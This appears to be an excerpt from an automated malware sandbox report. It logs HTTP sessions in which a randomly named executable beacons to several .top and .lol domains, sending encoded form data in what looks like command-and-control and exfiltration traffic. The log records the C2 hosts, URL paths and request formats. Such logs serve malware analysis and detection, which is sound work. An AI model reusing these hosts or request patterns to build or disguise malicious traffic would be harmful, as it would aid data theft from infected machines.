Jul 5, 2024 03:23:30.835377932 CEST	208	IN	HTTP/1.1 530 Date: Fri, 05 Jul 2024 01:23:30 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Server: cdn Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 31 34 37 2e 39 32 2e 33 36 2e 32 33 31 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 2c147.92.36.231 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	52657	147.92.36.231	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:32.449070930 CEST	10850	OUT	POST /1kbe/ HTTP/1.1 Host: www.a9jcpf.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.a9jcpf.top Referer: http://www.a9jcpf.top/1kbe/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 51 35 31 79 2f 6e 76 75 7a 2f 33 6e 53 34 4c 4f 32 41 74 2f 6f 5a 49 71 2b 6c 55 5a 4d 35 73 31 6b 7a 39 2f 67 47 63 45 62 67 59 55 6b 52 6c 65 75 33 34 41 53 69 37 2f 58 6c 56 4b 69 4f 79 57 75 30 4b 4f 39 53 7a 50 76 71 43 4d 74 63 69 42 75 33 6d 4d 78 4a 45 30 36 61 35 5a 51 41 68 6e 69 46 62 35 66 75 68 77 36 6f 43 4e 44 34 6c 30 6a 4f 66 30 2b 34 56 6c 36 77 76 48 7a 70 55 44 6b 74 6f 47 69 51 51 6c 6f 33 5a 73 6e 75 34 64 49 5a 41 4c 38 74 63 73 62 2b 77 74 7a 33 36 65 45 67 46 64 63 6b 6e 79 46 35 79 63 34 35 6f 38 5a 4d 55 31 55 4c 4f 59 43 54 62 7a 70 59 38 35 47 77 37 59 43 71 6c 47 6b 47 76 72 49 74 52 48 39 72 55 4c 74 78 74 70 65 4d 53 47 7a 39 72 45 54 76 2b 73 32 67 69 45 54 35 42 50 54 30 62 46 53 72 51 39 6d 38 65 7a 77 43 63 79 79 58 2b 71 76 63 57 47 6a 30 6d 49 6c 46 74 76 33 2b 78 66 6e 78 2f 4e 6d 50 30 36 6b 56 2f 35 32 51 47 30 4d 66 67 67 6e 68 7a 30 2b 4e 51 30 7a 5a 30 67 5a 69 48 34 76 56 4d 4b 5a 6e 62 4a 65 45 4f [TRUNCATED] Data Ascii: 9TND4h=gb4/VMkYx+ReQ51y/nvuz/3nS4LO2At/oZIq+lUZM5s1kz9/gGcEbgYUkRleu34ASi7/XlVKiOyWu0KO9SzPvqCMtciBu3mMxJE06a5ZQAhniFb5fuhw6oCND4l0jOf0+4Vl6wvHzpUDktoGiQQlo3Zsnu4dIZAL8tcsb+wtz36eEgFdcknyF5yc45o8ZMU1ULOYCTbzpY85Gw7YCqlGkGvrItRH9rULtxtpeMSGz9rETv+s2giET5BPT0bFSrQ9m8ezwCcyyX+qvcWGj0mIlFtv3+xfnx/NmP06kV/52QG0Mfggnhz0+NQ0zZ0gZiH4vVMKZnbJeEOp3iH4RpJuEXp0lv4A1bayKr5m2js5NvfMhUXlAg2OjduifjaxC3UdpndwDtOx2tDAbiDBwCWPrqLM1no8/NSqB3PN/PJjWraXLmsfjvnrxFJWnfGgyUD7fcTpbuKDVWv8pvKsR3C++QteUB0e6eKBcahAtg6Nu3j0ZUg83xxcIYI2WimruVPebeI6+K+IDp6lKFTAfVsUJyjcW02YhgTKMBOCk6X/D4rjduT0SvS4uQNSJml+I+cr8nC6nm3QW1j+bNjUC6l7J8FyttkHOYxvasIhSH/yZLtp1YuGgKAWp+w814M+ce9QMVuQ2x6a/BgwqOSXRbgTBHkPH7Vx+19cMB7C2aJ8+Txi9HpgJLX0Z6kxdQG2yiILhyLGEZ+YfVxgnW5H9A9nEMXvb74eMNVNOlFwoTNQEWvxMkWaXy13VOZ+hUIQl5IWi7Ya3E8QxztRVWV0LEfYRNI0KD1kXft+K5X/5kb8sKOLFtA18JCU8Yt2axIBxAYNbOVq50rVdnroLioApIleyxfIT5KaSdBaosdOO5N/tseDFJwoIkWjpDWaPMStPw7odwoRrDb+J+un2HzWMIYMIIz++fkVfK9sjmDz7znDhqEDkjAwW94pvzDjHUvtFQCghNWK0T0OU1ZcqohjaA0OmJG4JK2p7CGBHDaAyrvMESxvp [TRUNCATED]
Jul 5, 2024 03:23:33.342534065 CEST	208	IN	HTTP/1.1 530 Date: Fri, 05 Jul 2024 01:23:33 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Server: cdn Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 31 34 37 2e 39 32 2e 33 36 2e 32 33 31 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 2c147.92.36.231 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	52658	147.92.36.231	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:34.991939068 CEST	488	OUT	GET /1kbe/?MXOD=nDFLlbM87h&9TND4h=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlgXXfIxM6PM= HTTP/1.1 Host: www.a9jcpf.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 5, 2024 03:23:36.052324057 CEST	208	IN	HTTP/1.1 530 Date: Fri, 05 Jul 2024 01:23:35 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Server: cdn Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 31 34 37 2e 39 32 2e 33 36 2e 32 33 31 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 2c147.92.36.231 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	52659	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:41.421571016 CEST	751	OUT	POST /il19/ HTTP/1.1 Host: www.mhtnvro.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.mhtnvro.lol Referer: http://www.mhtnvro.lol/il19/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 77 68 38 5a 37 46 54 79 43 58 4d 4f 6e 56 7a 4c 6d 63 67 6a 2b 5a 43 69 72 33 6e 48 66 6c 54 6c 50 47 74 34 64 68 67 57 71 5a 42 64 35 34 79 6a 36 52 4f 68 2f 59 58 38 44 46 45 39 62 52 64 50 4e 32 50 77 79 35 6b 55 74 4b 6a 34 2f 71 53 47 7a 70 48 6f 64 42 36 76 71 75 4f 59 4e 49 4e 73 6b 64 48 44 5a 52 32 6b 71 4b 62 49 44 44 56 44 4b 36 67 73 63 77 55 64 61 62 53 6a 53 7a 4c 4a 4e 59 38 4a 65 55 56 65 76 50 4a 30 75 75 77 72 61 49 7a 44 6d 34 4a 68 36 39 4d 79 69 61 55 63 77 75 73 34 77 53 72 38 47 2b 39 32 38 54 33 6d 78 44 78 30 2f 51 3d 3d Data Ascii: 9TND4h=7Ucokq2EvY2qwh8Z7FTyCXMOnVzLmcgj+ZCir3nHflTlPGt4dhgWqZBd54yj6ROh/YX8DFE9bRdPN2Pwy5kUtKj4/qSGzpHodB6vquOYNINskdHDZR2kqKbIDDVDK6gscwUdabSjSzLJNY8JeUVevPJ0uuwraIzDm4Jh69MyiaUcwus4wSr8G+928T3mxDx0/Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	52660	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:44.022115946 CEST	771	OUT	POST /il19/ HTTP/1.1 Host: www.mhtnvro.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.mhtnvro.lol Referer: http://www.mhtnvro.lol/il19/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 32 79 55 5a 39 69 50 79 44 33 4d 42 37 6c 7a 4c 2f 4d 67 6e 2b 5a 65 69 72 7a 58 58 66 77 6a 6c 50 6a 4a 34 50 6a 49 57 72 5a 42 64 32 59 79 36 31 78 50 74 2f 59 62 61 44 48 41 39 62 51 35 50 4e 7a 7a 77 31 49 6b 58 72 4b 6a 36 6e 61 53 45 33 70 48 6f 64 42 36 76 71 74 79 32 4e 49 56 73 6b 75 66 44 4c 6a 53 72 78 71 62 4c 4b 6a 56 44 41 71 67 6f 63 77 55 2f 61 61 4f 46 53 32 50 4a 4e 59 73 4a 65 47 74 42 32 2f 4a 32 71 75 78 64 53 70 65 4a 2f 74 39 71 39 39 4d 4b 6c 61 73 74 78 6f 39 69 68 6a 4b 72 55 2b 5a 46 68 55 2b 53 38 41 4d 39 6b 65 38 35 31 4b 6a 46 68 4d 39 76 37 78 6f 50 65 77 6a 55 54 6f 41 3d Data Ascii: 9TND4h=7Ucokq2EvY2q2yUZ9iPyD3MB7lzL/Mgn+ZeirzXXfwjlPjJ4PjIWrZBd2Yy61xPt/YbaDHA9bQ5PNzzw1IkXrKj6naSE3pHodB6vqty2NIVskufDLjSrxqbLKjVDAqgocwU/aaOFS2PJNYsJeGtB2/J2quxdSpeJ/t9q99MKlastxo9ihjKrU+ZFhU+S8AM9ke851KjFhM9v7xoPewjUToA=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	52661	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:46.550359011 CEST	10853	OUT	POST /il19/ HTTP/1.1 Host: www.mhtnvro.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.mhtnvro.lol Referer: http://www.mhtnvro.lol/il19/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 37 55 63 6f 6b 71 32 45 76 59 32 71 32 79 55 5a 39 69 50 79 44 33 4d 42 37 6c 7a 4c 2f 4d 67 6e 2b 5a 65 69 72 7a 58 58 66 78 33 6c 50 31 56 34 4d 45 55 57 36 70 42 64 2f 34 79 2f 31 78 4f 33 2f 59 7a 47 44 48 4d 4c 62 54 52 50 43 78 4c 77 77 39 45 58 34 71 6a 36 37 71 53 48 7a 70 48 48 64 42 72 6d 71 75 4b 32 4e 49 56 73 6b 6f 62 44 4a 78 32 72 32 61 62 49 44 44 55 52 4b 36 67 41 63 78 78 43 61 62 36 7a 54 46 33 4a 4e 35 63 4a 63 31 56 42 2f 2f 4a 6f 6e 4f 78 56 53 70 53 4b 2f 72 59 54 39 2b 51 73 6c 5a 77 74 7a 4d 70 35 37 51 4f 44 4b 50 78 61 33 6e 4b 4e 39 78 6b 4c 6c 59 63 63 31 49 76 72 35 50 42 66 2b 7a 67 47 49 78 76 6e 51 2f 47 45 7a 63 33 46 35 55 4c 49 4e 57 63 45 50 32 76 66 75 2b 72 66 33 78 6b 32 72 45 52 42 61 6e 77 55 49 4f 30 79 57 77 35 35 66 6a 4c 4f 4f 71 75 66 5a 73 49 50 35 62 6c 35 34 31 35 76 61 6d 6f 56 37 75 76 4a 61 52 65 77 7a 32 48 45 72 6d 34 56 33 69 32 69 6a 38 2b 4e 4e 6b 4a 73 62 42 43 4d 4d 61 4f 6b 62 57 4e 32 45 72 48 50 57 31 73 66 73 57 4e [TRUNCATED] Data Ascii: 9TND4h=7Ucokq2EvY2q2yUZ9iPyD3MB7lzL/Mgn+ZeirzXXfx3lP1V4MEUW6pBd/4y/1xO3/YzGDHMLbTRPCxLww9EX4qj67qSHzpHHdBrmquK2NIVskobDJx2r2abIDDURK6gAcxxCab6zTF3JN5cJc1VB//JonOxVSpSK/rYT9+QslZwtzMp57QODKPxa3nKN9xkLlYcc1Ivr5PBf+zgGIxvnQ/GEzc3F5ULINWcEP2vfu+rf3xk2rERBanwUIO0yWw55fjLOOqufZsIP5bl5415vamoV7uvJaRewz2HErm4V3i2ij8+NNkJsbBCMMaOkbWN2ErHPW1sfsWNEeF0xFgCKL3O5aiETWTeAZRqYs3tCFn2ToJxbiN/3cANMrpQL91gBkkXNv+gLJaSsLut/xdZ3CjcfF/mmD/VZvzh4JcNxbRoapoERLRHG3CXuirGqLRaJeYIQ09TOufDH0ArqOHHZiSl9hlhvfVeXFZijKKgCWpvq559F3gE6zXRY2ERIrmE+za+wn9hUsA9R9js+Xrvf4RSveEGUdqQmf9hORq/q3G/R4BcMOqQ0UiKz9nbKz7QEIQjh035eZ/R7fB1PiswO6TjDZ22xW8I/uR2nFB96Qf/FdpN4d4Gr2LLLnpVZwwY3tIriqj8J+RTWjUgsl4u9/BFwVY0nrzAN/9D/ZxeIytPdEyi7f8SxIAePn7aZoDiydcf/eADxFmB7L8++OoBm1JZsG4JbHPXgLEizkQgVSqP+wHAQcLtdEbHAxqvztt7m7nZzvV0qOxe5VsAJwnQtfWRGoiMGx0SpKk/2HVtqavmVww9TZgu0hFpYW3wg1bXAx+WuIdOUbdbkSTFIXHv3eYDwG6gXw7mLV+O5sX7EhkV2XTiMQ5UfzQtX/Gaz59bxo63stSMrF+XpojWiU9t8POrlFl0Ivk4GVTKMJ0ZLgFtxqdrLkrEm+qaMGrhx+m8SpJgmEwD17y9ihN4WemtApjQwMmMpHm/KBqK+sih+qUJmm [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	52662	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:49.082597017 CEST	489	OUT	GET /il19/?9TND4h=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&MXOD=nDFLlbM87h HTTP/1.1 Host: www.mhtnvro.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	52663	203.161.55.102	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:15.863599062 CEST	754	OUT	POST /ff8d/ HTTP/1.1 Host: www.lexiecos.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.lexiecos.top Referer: http://www.lexiecos.top/ff8d/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6e 6e 52 71 62 57 77 5a 47 70 49 69 39 79 44 51 6c 57 62 56 45 2b 33 4f 7a 44 67 74 44 63 57 72 77 4a 36 47 50 79 63 5a 62 62 41 4d 48 7a 67 6d 47 65 67 77 6c 53 44 47 2f 6d 7a 55 52 70 74 68 6f 64 41 59 66 56 6d 45 4a 59 50 30 38 33 57 57 70 70 78 71 67 32 32 6b 45 57 49 38 2f 73 4c 52 7a 71 4d 2b 6a 42 79 4b 7a 5a 35 76 68 62 49 32 66 7a 39 45 39 4a 57 41 33 49 4f 38 4a 44 37 4f 72 77 37 2b 4e 45 6c 38 52 7a 61 74 2f 78 77 76 68 75 73 49 6c 69 7a 44 31 2f 6f 77 52 35 56 6d 75 70 79 52 72 69 71 32 4a 6c 6e 41 6f 6b 38 51 65 63 79 4d 6e 77 3d 3d Data Ascii: 9TND4h=ljhj3Grls4QknnRqbWwZGpIi9yDQlWbVE+3OzDgtDcWrwJ6GPycZbbAMHzgmGegwlSDG/mzURpthodAYfVmEJYP083WWppxqg22kEWI8/sLRzqM+jByKzZ5vhbI2fz9E9JWA3IO8JD7Orw7+NEl8Rzat/xwvhusIlizD1/owR5VmupyRriq2JlnAok8QecyMnw==
Jul 5, 2024 03:24:16.479969025 CEST	533	IN	HTTP/1.1 404 Not Found Date: Fri, 05 Jul 2024 01:24:16 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	52664	203.161.55.102	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:18.527865887 CEST	774	OUT	POST /ff8d/ HTTP/1.1 Host: www.lexiecos.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.lexiecos.top Referer: http://www.lexiecos.top/ff8d/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6d 48 42 71 63 77 34 5a 52 35 49 6a 6a 69 44 51 76 32 61 65 45 2b 7a 4f 7a 47 52 77 57 2b 69 72 7a 73 57 47 4f 77 30 5a 57 37 41 4d 66 6a 67 6a 4d 2b 68 79 6c 53 4f 6d 2f 6b 6e 55 52 70 52 68 6f 66 59 59 65 69 36 46 49 49 50 68 31 58 57 55 30 35 78 71 67 32 32 6b 45 56 31 72 2f 73 44 52 79 61 38 2b 69 6b 4f 4a 36 35 35 73 70 37 49 32 62 7a 39 36 39 4a 58 56 33 4e 76 62 4a 41 44 4f 72 30 2f 2b 4f 56 6c 39 61 7a 61 52 69 42 78 39 73 4c 4e 6c 71 48 47 5a 39 64 49 70 62 61 35 78 72 76 6a 4c 36 54 4c 68 62 6c 44 7a 31 6a 31 6b 54 66 50 46 38 77 4f 75 65 74 33 41 44 77 4d 71 43 54 77 2f 57 31 7a 4d 41 68 55 3d Data Ascii: 9TND4h=ljhj3Grls4QkmHBqcw4ZR5IjjiDQv2aeE+zOzGRwW+irzsWGOw0ZW7AMfjgjM+hylSOm/knURpRhofYYei6FIIPh1XWU05xqg22kEV1r/sDRya8+ikOJ655sp7I2bz969JXV3NvbJADOr0/+OVl9azaRiBx9sLNlqHGZ9dIpba5xrvjL6TLhblDz1j1kTfPF8wOuet3ADwMqCTw/W1zMAhU=
Jul 5, 2024 03:24:19.220621109 CEST	533	IN	HTTP/1.1 404 Not Found Date: Fri, 05 Jul 2024 01:24:19 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	52665	203.161.55.102	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:21.080123901 CEST	10856	OUT	POST /ff8d/ HTTP/1.1 Host: www.lexiecos.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.lexiecos.top Referer: http://www.lexiecos.top/ff8d/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 6c 6a 68 6a 33 47 72 6c 73 34 51 6b 6d 48 42 71 63 77 34 5a 52 35 49 6a 6a 69 44 51 76 32 61 65 45 2b 7a 4f 7a 47 52 77 57 2b 61 72 7a 61 43 47 4d 58 6f 5a 58 37 41 4d 42 7a 67 69 4d 2b 68 7a 6c 54 6d 35 2f 6b 36 68 52 73 64 68 70 38 51 59 5a 54 36 46 48 49 50 68 33 58 57 52 70 70 77 67 67 79 71 67 45 56 6c 72 2f 73 44 52 79 59 6b 2b 6c 78 79 4a 38 35 35 76 68 62 49 79 66 7a 39 42 39 4b 6e 46 33 4e 6a 68 4a 52 6a 4f 72 51 62 2b 65 33 39 39 46 44 61 70 68 42 77 34 73 4c 4a 6d 71 42 69 64 39 5a 41 54 62 5a 6c 78 71 6f 69 41 39 6a 54 78 45 6d 6d 68 71 44 78 2f 55 2b 6e 48 79 48 62 52 62 39 6e 76 64 41 38 38 47 54 31 4c 52 41 79 4b 53 42 53 54 6b 46 46 4a 65 44 42 68 31 47 52 33 57 66 70 78 48 4d 4a 46 63 6e 6c 47 4e 69 57 2f 77 57 6a 67 6c 69 79 75 49 6f 56 57 59 58 6a 37 69 67 67 67 50 47 57 34 64 67 7a 6a 62 50 69 54 74 75 77 70 75 45 74 4c 6b 61 4b 54 66 4d 32 56 59 6a 56 49 6a 54 32 50 6f 37 6c 43 7a 68 54 75 65 6b 65 54 6f 30 68 38 65 44 65 6e 2b 6c 33 52 66 39 59 69 4c 55 35 [TRUNCATED] Data Ascii: 